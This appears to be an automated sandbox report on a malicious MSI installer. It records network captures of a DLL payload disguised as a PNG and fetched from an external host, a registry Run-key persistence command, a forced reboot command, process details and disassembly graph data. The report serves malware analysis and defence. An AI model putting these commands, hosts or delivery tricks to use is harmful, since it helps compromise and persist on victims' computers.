                                                May 16, 2024 04:41:46.088874102 CEST195OUTGET /V77lpd/index.php?VS=V7&PL=NAO HTTP/1.1
                                                User-Agent: "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"
                                                Host: 194.180.191.36
                                                Connection: Keep-Alive
                                                May 16, 2024 04:41:46.459820986 CEST254INHTTP/1.1 302 Found
                                                Date: Thu, 16 May 2024 02:41:46 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Location: https://amxx1515cabreun23.asxo/
                                                Content-Length: 5
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 4d 69 61 6d 69
                                                Data Ascii: Miami


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704194.180.191.244435624C:\Windows\SysWOW64\msiexec.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-16 02:40:59 UTC172OUTGET /v7icosaza/rain.png HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                Host: presteservicosaz.pro
                                                2024-05-16 02:40:59 UTC253INHTTP/1.1 200 OK
                                                Date: Thu, 16 May 2024 02:40:59 GMT
                                                Server: Apache/2.4.41 (Ubuntu)
                                                Last-Modified: Wed, 15 May 2024 18:30:57 GMT
                                                ETag: "b2b47-6188251c5da40"
                                                Accept-Ranges: bytes
                                                Content-Length: 731975
                                                Connection: close
                                                Content-Type: image/png
                                                2024-05-16 02:40:59 UTC16384INData Raw: 50 4b 03 04 14 00 00 00 08 00 c1 7a af 58 76 9b 2b 8a 18 4f 00 00 00 ca 00 00 17 00 00 00 43 4f 53 4d 44 4f 4b 4c 4f 2e 43 4f 53 4d 44 4f 4b 4c 4f 2e 64 6c 6c cc 5b 7f 70 1c d5 7d 7f f7 76 6f 77 6f ef 4e d2 ea 4e 77 b2 30 3e d9 d8 f2 5a 7b 92 8d c1 70 38 8e 64 30 36 92 65 1b 49 34 20 d9 10 5b b6 65 2c 63 7b a9 ce a6 29 aa 1c 0f 60 20 54 36 04 48 3b e3 02 49 3d 43 26 90 21 6d 29 01 97 0c 94 c0 b4 01 0a 54 86 24 43 26 b1 69 a7 cd 0c 6d d3 69 a7 b4 4d fe a9 dc ef f7 fb de de ee 9e 74 f2 89 98 b4 1a ef ed be b7 df f7 7d df 1f 9f f7 7d ef 7d f7 79 f3 d6 47 98 c2 18 53 e1 3a 7f 9e b1 d3 4c fc ad 65 17 fe 3b 0a 57 4d ee e5 1a f6 42 ec dd 85 a7 23 9b de 5d f8 5b 7b 47 8a cd 77 8e ba b7 8f 0e 1d 68 de 35 74 f0 a0 7b a8 79 e7 70 f3 e8 e1 83 cd 23 07 9b af bf f1 a6
                                                Data Ascii: PKzXv+OCOSMDOKLO.COSMDOKLO.dll[p}vowoNNw0>Z{p8d06eI4 [e,c{)` T6H;I=C&!m)T$C&imiMt}}}yGS:Le;WMB#][{Gwh5t{yp#
                                                2024-05-16 02:40:59 UTC16384INData Raw: 8d 70 b0 64 ee cd 41 a7 19 36 cf 46 3c 1c 83 99 93 7c 2e f4 82 fa 7c 18 83 98 87 07 e0 c6 16 1b cc dc 9e 83 9a 5b 74 50 b3 83 49 03 87 93 b1 cd 5a 3a 63 ec 40 a5 8e a6 26 77 a8 92 3b d3 d2 a4 b4 1c 2f ef 10 e9 00 a9 74 0c 7d 5a 84 36 2d 39 92 19 e5 1e 6c 2c 43 10 a7 8f a7 23 3d 3e c9 d1 a6 7d 9f 64 d7 cc dc f4 8f 89 6f a5 e1 8d 64 52 c9 11 33 a9 06 ce 3b a3 b5 26 f9 ee 83 73 b3 9e 5c b0 86 b8 16 d6 b9 2e e3 ec 59 b3 df 85 93 5b 91 4c 5b 6a bb a6 af ca 2f 73 65 70 e4 b3 9e 79 a2 c0 61 9b b3 49 19 90 5d a9 58 32 d7 80 f9 ee d3 a8 45 e2 61 7d 66 c1 cd 23 47 cd 48 cf 28 5a fe 6c 6b 7a b4 20 65 d3 c3 47 ae 6b 67 ae f2 cd 65 bc b1 94 3d ce ba f4 88 85 67 93 94 ae 69 42 7a cd 18 df 45 9b 8d 19 5d 12 1c c5 1d ab 2d ca f7 36 42 03 8d f3 28 27 b3 5f 19 21 3a f5 68
                                                Data Ascii: pdA6F<|.|[tPIZ:c@&w;/t}Z6-9l,C#=>}dodR3;&s\.Y[L[j/sepyaI]X2Ea}f#GH(Zlkz eGkge=giBzE]-6B('_!:h
                                                2024-05-16 02:41:00 UTC16384INData Raw: e5 74 72 5a 56 6f c4 45 56 b6 af 61 0c 32 d9 b3 22 c1 6a 26 93 f4 84 12 8e 9c 89 69 37 6d d0 b3 8b a2 47 ea 99 cc ca 9b e3 2c 7d 0c 6c b1 94 35 ca 5e 32 80 5c 58 c9 28 21 5f 68 c0 4d 11 d8 51 c4 e4 74 2d 47 90 d2 b5 46 d0 24 db dd a7 18 43 b2 e7 d0 81 33 dd 9c 5f 13 6e 5e e4 84 cd 4d 18 6b 1b 58 63 65 53 59 95 e7 28 4b 77 83 2c b9 27 b6 ec 3d 71 e4 c2 ba 46 09 05 43 71 37 39 e0 45 51 92 d3 bb 1c 35 4a ef 76 80 20 29 b3 97 78 78 48 a1 63 67 4e a9 fc c2 21 d3 d1 3a 37 57 2c 77 20 8c c5 4e 65 b5 26 47 57 fa 14 88 62 ad ab 97 dd 2a 81 64 58 ea 28 a3 aa 50 c2 cd 0e 34 8b 19 71 04 30 37 4c 48 01 ac 57 c3 44 56 0e 13 e3 3c 4c 40 c0 6a 9c 61 c2 16 40 d7 38 31 81 71 a2 96 fb 52 e2 ea 71 62 80 42 ae 53 82 95 93 29 dd 13 16 49 b7 36 b1 be 21 38 0f c4 5f 8a 9a a3 4d
                                                Data Ascii: trZVoEVa2"j&i7mG,}l5^2\X(!_hMQt-GF$C3_n^MkXceSY(Kw,'=qFCq79EQ5Jv )xxHcgN!:7W,w Ne&GWb*dX(P4q07LHWDV<L@ja@81qRqbBS)I6!8_M
                                                2024-05-16 02:41:00 UTC16384INData Raw: c3 6a f1 17 59 85 ef 2c fe b8 7e b7 a4 d3 b2 9f 2f 5c 7e b9 fc 72 f9 f5 8d f2 2b bc 3c ff ed 3f 5c 7e ad 21 7e d5 4f 62 99 55 3c a3 91 01 67 e4 e8 39 a3 47 f1 ac 4f c5 66 ab af 46 d1 48 be 83 2d 92 3f c6 67 c8 c3 9e c3 36 01 f9 6f 15 55 4a 9d 54 39 00 b0 8f 34 6e 4f 6d 72 f2 e5 80 0f ab c6 ed 70 d4 04 69 5e fc 7f f6 ae 3e b8 a9 2b bb cb b2 8d 45 0a 5c 6d 42 82 db 81 44 6d 97 35 30 f5 d4 99 c4 31 93 ae b3 6e 77 08 e0 1d 70 62 62 13 42 01 d9 5b 84 81 21 0f 23 3b ee 64 c7 31 5d 87 49 40 9b 5d 4f 66 3a 9d 4d fb 07 dd d9 9d d9 a6 dd 29 6d 77 67 d2 fc 25 3b 7e 32 4e 56 f8 53 b6 41 7c 08 db c2 76 84 b0 09 91 b1 80 27 f5 9c 73 ef d3 97 65 23 1b 53 58 f2 3c f3 de 79 7a 1f 7e f7 9e fb 3b e7 dc 7b df bd bf 1b 67 34 1d 54 a1 33 1c 59 91 60 31 90 3e 6c d0 93 31 c4 db
                                                Data Ascii: jY,~/\~r+<?\~!~ObU<g9GOfFH-?g6oUJT94nOmrpi^>+E\mBDm501nwpbbB[!#;d1]I@]Of:M)mwg%;~2NVSA|v'se#SX<yz~;{g4T3Y`1>l1
                                                2024-05-16 02:41:00 UTC16384INData Raw: 8e 3e 4a 34 57 c6 cd a7 92 93 f4 e1 0f c1 4b 65 5c 0b 32 94 bc f0 66 15 97 bd 74 14 de 04 bd 89 a7 9d 18 11 e3 83 11 2d e4 1e 00 e1 c3 4c 78 69 f3 38 fd 57 9b 22 bf 9c e9 1f b8 5a f6 73 6e 44 ee 44 5d 57 ab cf 9b e6 b7 79 4e 57 fe c8 8c 97 35 f6 81 8a d4 81 13 97 f1 f8 f2 03 57 69 ff 8f 38 8d 79 58 73 6f bf e2 63 df b7 f4 3a e0 0b a3 aa 1a 28 e4 eb 51 33 b8 c7 63 e4 ee 9a c9 7d 0b b8 8f 68 0e 33 cf 0f 0b ff 33 99 1f 1f 0c f2 5f 99 f8 3b cc fd d2 66 90 fe c7 28 83 e1 56 ee 1d 03 dc 84 91 f6 81 72 1e 87 f6 a9 3d b4 ff 2c 74 60 c9 37 98 3b 34 02 67 fc db 8f 38 25 62 ca d3 8f 6d 33 90 d3 88 a7 1f fc 75 9e 66 85 4e ee 0e 79 ef 59 47 bb 4f e0 8d f4 cb 9d 29 d4 75 92 f6 f5 50 f3 81 93 65 09 8e 58 da 37 40 2d 8e f5 c6 ca f4 58 57 39 13 7a 23 b6 c2 1b 68 48 8f 30
                                                Data Ascii: >J4WKe\2ft-Lxi8W"ZsnDD]WyNW5Wi8yXsoc:(Q3c}h33_;f(Vr=,t`7;4g8%bm3ufNyYGO)uPeX7@-XW9z#hH0
                                                2024-05-16 02:41:00 UTC16384INData Raw: 0d c0 d8 da 14 88 a6 d5 84 af 39 51 a4 42 0d fe 0b 2a 4c b3 df e7 85 c1 39 38 26 c6 d5 50 73 20 54 0b 05 79 38 5f 1d 93 89 18 bc 15 86 ea 70 1b dc 15 6d 34 51 ea d2 d4 39 93 cd 9e 9e 29 93 c7 a6 92 9e 14 dc 17 8d 6a d2 7f d2 b8 a0 78 0e cc b0 e5 39 6b 86 da 40 7f 95 f0 9f 6c 61 0f 84 19 2f 66 17 45 46 4c b7 f0 7d 60 06 6e 50 53 ea 98 25 73 70 93 ea 0b 1c 2e d3 f6 69 26 d3 00 51 75 30 19 08 f6 62 61 4f de aa 0e 3b b8 67 c9 7c f8 60 43 5d 81 50 3b 11 d2 54 ca 93 a1 fe c3 d8 da 86 3a 34 66 a8 c9 93 34 8f 62 62 e1 83 6a f7 c3 e8 15 6e f6 9f a7 5d a9 ce 17 d0 5e 98 50 f1 e2 ac b5 1f 5d 12 5f 0c de e1 54 87 d7 c9 3b 6e 87 a7 f5 28 e7 f6 a6 e9 15 d3 26 4f 0b ac d2 78 b2 9a 34 83 0d a4 88 32 dd 1a a7 85 75 f9 67 69 ae 0e b3 ef 22 a9 fa 3d e7 cd 63 60 30 01 e2 79
                                                Data Ascii: 9QB*L98&Ps Ty8_pm4Q9)jx9k@la/fEFL}`nPS%sp.i&Qu0baO;g|`C]P;T:4f4bbjn]^P]_T;n(&Ox42ugi"=c`0y
                                                2024-05-16 02:41:00 UTC16384INData Raw: e6 19 14 66 93 82 08 a1 5e 3b 7d 43 b0 2c a9 ff d5 d0 8f 11 d8 92 a7 2b 3f e8 aa 52 5d fa ec cc 50 1b d7 8f e4 e2 b5 19 2e 76 22 1a 63 b8 05 29 ef f5 1c 8c 52 b3 2e 5b c8 ba 71 6d a4 16 2b 2f 4e 89 77 e7 ec 92 52 19 db 3d b5 77 81 b3 c7 42 4c 44 a7 9a 2a c0 11 4f bd ea 6c 01 d2 9a 92 3a bf 36 92 94 52 d7 ec f2 eb 23 f5 90 5d c9 2c fc 39 99 0b 62 9f e3 b4 ed 0a 31 b5 8a 3f d8 19 e9 12 68 ce b4 8c 63 af d8 01 76 52 ce 09 b3 61 ad d8 d4 5b d9 ec 2f d1 a8 66 d4 42 ed ca 70 dd 5a 94 dd 69 51 e1 3a 2e bc a7 68 1f b0 21 09 ef c4 bf 0b cb 3e 68 ed 85 33 09 02 dc 5d e6 51 8d 8a e0 27 2a f7 d4 19 41 56 a4 11 ec 58 2f 15 2c c5 09 32 84 30 07 a2 10 33 72 04 50 43 07 d3 23 c2 c2 8c 8c c0 16 3c 84 f8 d1 0c aa 44 a9 58 2d 4e ff e2 c3 e5 c4 03 c3 03 b1 93 32 19 86 eb 23
                                                Data Ascii: f^;}C,+?R]P.v"c)R.[qm+/NwR=wBLD*Ol:6R#],9b1?hcvRa[/fBpZiQ:.h!>h3]Q'*AVX/,203rPC#<DX-N2#
                                                2024-05-16 02:41:00 UTC16384INData Raw: 33 ea da e3 56 5d 50 ef 46 fe 2f f5 b5 ff da 60 f0 d3 c7 60 d2 3d 73 7b a4 67 b6 5d e4 95 37 83 af 70 21 af ac b9 c8 2b b5 28 0b 71 e8 f2 2f 15 f4 57 a3 02 af 2e 5a 89 1b 08 f7 90 66 b1 b2 26 3a 3b f4 c5 0e df e3 64 4f 8d 90 21 4b f2 4a 7e 55 37 12 93 0b ee c3 86 45 93 b6 30 8a 1e b2 bd 72 5b 25 10 e0 91 0f 7b c6 d6 f9 e2 2c 07 b4 ec eb 0b e4 d8 a2 0f 81 93 f0 cc f7 5d 2c 43 96 48 2e 07 86 9e af 18 af 4e 4b c6 b8 d3 d2 70 d0 52 cf 10 9f 95 55 5f 13 9f bd aa 8f 35 e7 0a 50 a8 53 03 b6 26 8a 9c aa 89 57 b2 b9 22 d5 45 1d f4 dc 7d 5a 74 92 bf 25 03 cd d8 c2 ce c9 85 1d 5c 3d 0e d4 6c 7a d5 21 ce 9f 2e 5d cf 1b e8 d2 11 71 98 49 7b 9c e0 da 3d 4f 1a 69 29 dc 90 13 a5 f5 2b 13 ca 66 c2 88 d1 b1 5a c6 7c d1 9c e2 b2 14 b8 9e 9f e9 98 1f 4d c7 8e c5 9b 49 81 e9
                                                Data Ascii: 3V]PF/``=s{g]7p!+(q/W.Zf&:;dO!KJ~U7E0r[%{,],CH.NKpRU_5PS&W"E}Zt%\=lz!.]qI{=Oi)+fZ|MI
                                                2024-05-16 02:41:00 UTC16384INData Raw: 45 1a 9f e0 e7 ba a2 82 d9 ba de 28 f6 0f 40 85 8e 17 38 68 8f 05 f9 9e 36 90 f2 6c bf 0c e5 f9 5d 98 f2 a4 df 1d 54 9e 6b 2b cb 8f 1b 02 2a d4 d1 37 a8 0a f9 f5 e7 9a 19 ec cc 9a 43 25 6f 94 4a df b7 be 01 12 59 2a 55 18 fc 6a d4 d1 e7 57 a3 6f ff 4f 98 1a 2d fa ce c0 6a 74 84 c9 7c 33 4d fc 75 84 12 c4 fd ba bf 1a 09 5c e8 4c 94 c6 b4 c8 5f c0 c1 5f 45 14 d0 f8 2b 5d 8b d2 42 33 68 bf 9a 3e b9 4f 74 ad ea 48 c4 13 3e 3e 22 7f 61 bb 40 b7 b0 43 87 1f 63 da 95 23 78 73 78 63 88 76 49 7a 2e f1 5b aa 32 6f 92 ff 98 67 25 2f be 66 f8 5a 55 29 1a 5a 13 c5 3e c3 c2 4e 9c ce 40 fd c2 83 e1 54 97 69 0e fd cb 6d 7e f5 ca 13 03 ea 95 c3 d4 6b dc fd ec 98 2a f3 91 39 f4 8d 07 41 bd f2 52 88 0d 20 4c a9 78 38 a8 5b c5 f4 86 c3 9a 6e d9 92 41 ad 6c 53 49 a2 62 8b 43
                                                Data Ascii: E(@8h6l]Tk+*7C%oJY*UjWoO-jt|3Mu\L__E+]B3h>OtH>>"a@Cc#xsxcvIz.[2og%/fZU)Z>N@Tim~k*9AR Lx8[nAlSIbC
                                                2024-05-16 02:41:00 UTC16384INData Raw: f8 6e 52 ce 86 ff 06 38 8c ae fa 6c 64 3e 4b e6 c3 14 1a f4 35 e3 6a ec ea 4a e5 55 79 58 a5 51 2b 79 78 ff 14 42 13 a8 ff 3b 8e 46 27 97 c4 2e bd 37 f1 7b 6c 95 52 d3 a0 79 e6 83 5f 0f f2 30 32 c8 01 e5 9e cf 59 0c 12 69 ee 66 e8 ab 02 53 2c be 9c 18 9f 7a a5 9f b3 1a 6c 92 13 89 27 ed eb 83 e7 1c 3a 1b f4 a4 2d cf 5b ea 64 c2 d6 e5 39 38 3a df 5f 10 09 1c 68 08 84 ec 56 c8 40 a5 7a 44 4a 45 5f 32 16 c9 66 5e c7 48 1f 78 0b f0 e3 fc 83 19 ea 74 e5 60 9f 36 45 0a fd 64 01 87 8e 31 95 41 7e 5c 1a e6 c9 89 cb 93 1f c9 f3 f4 88 79 62 be 09 6a e1 93 e3 16 cc 1e d1 a2 25 c3 dd cc b8 f2 73 23 e5 97 8e 58 7e 56 5c 9e bc 48 9e b4 11 f3 c4 ad 58 9d 42 2c c6 e7 21 8d b5 f8 0d c0 c5 49 ff cd db d5 47 47 51 65 f9 ae 4e 03 0d 89 54 94 c8 d7 89 10 46 54 10 74 d3 b3 ca
                                                Data Ascii: nR8ld>K5jJUyXQ+yxB;F'.7{lRy_02YifS,zl':-[d98:_hV@zDJE_2f^Hxt`6Ed1A~\ybj%s#X~V\HXB,!IGGQeNTFTt


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:04:40:52
                                                Start date:16/05/2024
                                                Path:C:\Windows\System32\msiexec.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\2ztvLMT477.msi"
                                                Imagebase:0x7ff6f78b0000
                                                File size:69'632 bytes
                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:04:40:52
                                                Start date:16/05/2024
                                                Path:C:\Windows\System32\msiexec.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                Imagebase:0x7ff6f78b0000
                                                File size:69'632 bytes
                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:3
                                                Start time:04:40:53
                                                Start date:16/05/2024
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6DA856019EF511E6D177907A9FD12D28
                                                Imagebase:0x540000
                                                File size:59'904 bytes
                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:04:41:16
                                                Start date:16/05/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
                                                Imagebase:0x790000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:04:41:17
                                                Start date:16/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:04:41:17
                                                Start date:16/05/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v EpIiyFGAaICB /t reg_sz /d "C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
                                                Imagebase:0xa30000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:04:41:17
                                                Start date:16/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:04:41:18
                                                Start date:16/05/2024
                                                Path:C:\Windows\SysWOW64\shutdown.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\shutdown.exe" /r /f /t 10
                                                Imagebase:0x9a0000
                                                File size:23'552 bytes
                                                MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:04:41:18
                                                Start date:16/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:04:41:27
                                                Start date:16/05/2024
                                                Path:C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
                                                Imagebase:0xcc0000
                                                File size:1'104'320 bytes
                                                MD5 hash:436671A4DCE78AE4ECC22924984D301C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                General

                                                Target ID:12
                                                Start time:04:41:35
                                                Start date:16/05/2024
                                                Path:C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\EpIiyF\GAaICB\EpIiyF_GAaICB.exe"
                                                Imagebase:0xcc0000
                                                File size:1'104'320 bytes
                                                MD5 hash:436671A4DCE78AE4ECC22924984D301C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:2.8%
                                                  Dynamic/Decrypted Code Coverage:15.9%
                                                  Signature Coverage:9.6%
                                                  Total number of Nodes:408
                                                  Total number of Limit Nodes:10
                                                  execution_graph 74901 d61c36 74902 d61c3f 74901->74902 74909 d61ff4 IsProcessorFeaturePresent 74902->74909 74904 d61c4b 74910 d63612 10 API calls 2 library calls 74904->74910 74906 d61c50 74908 d61c54 74906->74908 74911 d63631 7 API calls 2 library calls 74906->74911 74909->74904 74910->74906 74911->74908 74891 70f9cd8 74892 70f9cdd GetCurrentProcess 74891->74892 74894 70f9d69 74892->74894 74895 70f9d70 GetCurrentThread 74892->74895 74894->74895 74896 70f9dad GetCurrentProcess 74895->74896 74897 70f9da6 74895->74897 74898 70f9de3 74896->74898 74897->74896 74899 70f9e0b GetCurrentThreadId 74898->74899 74900 70f9e3c 74899->74900 74912 70fa328 DuplicateHandle 74913 70fa3be 74912->74913 74914 5697200 74916 5697201 74914->74916 74915 5697304 74915->74915 74916->74915 74918 5696cac 74916->74918 74919 5698290 CreateActCtxA 74918->74919 74921 5698353 74919->74921 74414 cecec4 GetInstallDetailsPayload 74417 d3f0c2 74414->74417 74420 d61774 RaiseException EnterCriticalSection LeaveCriticalSection ___std_exception_copy CallUnexpected 74417->74420 74419 ceced3 74420->74419 74421 d7ab9b GetLastError 74422 d7abb1 74421->74422 74423 d7abb7 74421->74423 74450 d7b294 6 API calls __dosmaperr 74422->74450 74439 d7abbb ___std_exception_copy 74423->74439 74440 d7b2d3 74423->74440 74427 d7ac40 SetLastError 74430 d7ac01 74433 d7b2d3 __dosmaperr 6 API calls 74430->74433 74431 d7abf0 74432 d7b2d3 __dosmaperr 6 API calls 74431->74432 74432->74439 74434 d7ac0d 74433->74434 74435 d7ac11 74434->74435 74436 d7ac28 74434->74436 74438 d7b2d3 __dosmaperr 6 API calls 74435->74438 74451 d7ad5c EnterCriticalSection LeaveCriticalSection __dosmaperr 74436->74451 74438->74439 74439->74427 74452 d7b6c9 74440->74452 74443 d7b30d TlsSetValue 74444 d7abd3 74444->74439 74445 d2aad0 74444->74445 74448 d2aae0 74445->74448 74446 d2ab11 74446->74430 74446->74431 74448->74446 74460 d49290 74448->74460 74495 d4b2c0 EnterCriticalSection LeaveCriticalSection ___std_exception_copy 74448->74495 74450->74423 74451->74439 74453 d7b6f9 74452->74453 74454 d7b2ef 74452->74454 74453->74454 74459 d7b5fe LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_FlsGetValue 74453->74459 74454->74443 74454->74444 74456 d7b70d 74456->74454 74457 d7b713 GetProcAddress 74456->74457 74457->74454 74458 d7b723 __dosmaperr 74457->74458 74458->74454 74459->74456 74461 d492b4 74460->74461 74462 d494df 74460->74462 74461->74462 74468 d492c3 74461->74468 74496 d4aff0 74462->74496 74464 d494ec 74527 d3e970 181 API calls 74464->74527 74465 d49809 ReleaseSRWLockExclusive 74478 d4975a 74465->74478 74466 d49456 TryAcquireSRWLockExclusive 74467 d49471 74466->74467 74475 d49478 74466->74475 74526 d3c4b0 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 74467->74526 74468->74464 74468->74466 74472 d49392 74468->74472 74468->74478 74471 d496d2 74502 d53fc0 74471->74502 74472->74466 74474 d4939f 74472->74474 74486 d494f6 TryAcquireSRWLockExclusive 74474->74486 74489 d493c0 _unexpected 74474->74489 74529 d3bed0 181 API calls _ValidateLocalCookies 74474->74529 74475->74471 74476 d49622 ReleaseSRWLockExclusive 74475->74476 74475->74478 74487 d49536 74476->74487 74478->74465 74531 d3c280 5 API calls _ValidateLocalCookies 74478->74531 74479 d4952f 74528 d3c4b0 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 74479->74528 74481 d496ea 74481->74478 74485 d53fc0 176 API calls 74481->74485 74483 d49679 ReleaseSRWLockExclusive 74483->74471 74484 d495bd 74484->74486 74484->74489 74485->74478 74486->74479 74486->74487 74487->74478 74487->74481 74487->74483 74490 d49438 74489->74490 74491 d495d6 74489->74491 74525 d61fe6 5 API calls ___raise_securityfailure 74490->74525 74530 d3c280 5 API calls _ValidateLocalCookies 74491->74530 74493 d4944c 74493->74448 74495->74448 74497 d4b010 _unexpected 74496->74497 74497->74497 74501 d4b117 74497->74501 74532 d3c640 TryAcquireSRWLockExclusive 74497->74532 74499 d4b12e 74499->74464 74552 d61fe6 5 API calls ___raise_securityfailure 74501->74552 74503 d5409d 74502->74503 74513 d53ff2 74502->74513 74520 d54060 74503->74520 74748 d54790 181 API calls 74503->74748 74506 d54091 74506->74481 74507 d5400d 74508 d5476c 74507->74508 74510 d54019 74507->74510 74509 d54779 ReleaseSRWLockExclusive 74508->74509 74508->74520 74753 d3c890 17 API calls 74509->74753 74512 d54250 74510->74512 74518 d54037 74510->74518 74510->74520 74749 d562a0 181 API calls _ValidateLocalCookies 74512->74749 74513->74507 74513->74520 74732 d54c70 74513->74732 74517 d5433d 74517->74520 74751 d3c820 VirtualFree GetLastError 74517->74751 74518->74520 74750 d3c280 5 API calls _ValidateLocalCookies 74518->74750 74747 d61fe6 5 API calls ___raise_securityfailure 74520->74747 74521 d54648 ReleaseSRWLockExclusive 74752 d54e10 17 API calls 74521->74752 74524 d5448e 74524->74507 74524->74521 74525->74493 74526->74475 74527->74486 74528->74487 74529->74484 74530->74475 74531->74478 74533 d3c678 74532->74533 74534 d3c65e 74532->74534 74556 d3c4b0 TryAcquireSRWLockExclusive AcquireSRWLockExclusive 74533->74556 74536 d3c667 ReleaseSRWLockExclusive 74534->74536 74537 d3c688 74534->74537 74538 d3c80c 74536->74538 74547 d3c6f9 74537->74547 74553 d560e0 74537->74553 74538->74501 74541 d3c813 74542 d560e0 178 API calls 74543 d3c6c9 74542->74543 74544 d560e0 178 API calls 74543->74544 74545 d3c6e1 74544->74545 74546 d560e0 178 API calls 74545->74546 74546->74547 74547->74541 74557 d3b820 17 API calls 74547->74557 74549 d3c7d2 74550 d3c7e7 ReleaseSRWLockExclusive 74549->74550 74558 d3b9a0 TryAcquireSRWLockExclusive ReleaseSRWLockExclusive TryAcquireSRWLockExclusive AcquireSRWLockExclusive TlsAlloc 74549->74558 74550->74538 74552->74499 74559 d55ed0 74553->74559 74555 d3c6b1 74555->74542 74556->74534 74557->74549 74558->74550 74560 d55ef1 74559->74560 74561 d55eea 74559->74561 74623 d56100 74560->74623 74617 d5f780 74561->74617 74564 d55f0c 74565 d55f38 74564->74565 74566 d55f22 VirtualFree 74564->74566 74573 d560b8 74564->74573 74567 d56100 171 API calls 74565->74567 74565->74573 74566->74565 74575 d560d2 74566->74575 74568 d55f6d 74567->74568 74570 d55f83 VirtualFree 74568->74570 74568->74573 74576 d55f99 74568->74576 74569 d55ed0 171 API calls 74571 d560f9 74569->74571 74570->74575 74570->74576 74571->74555 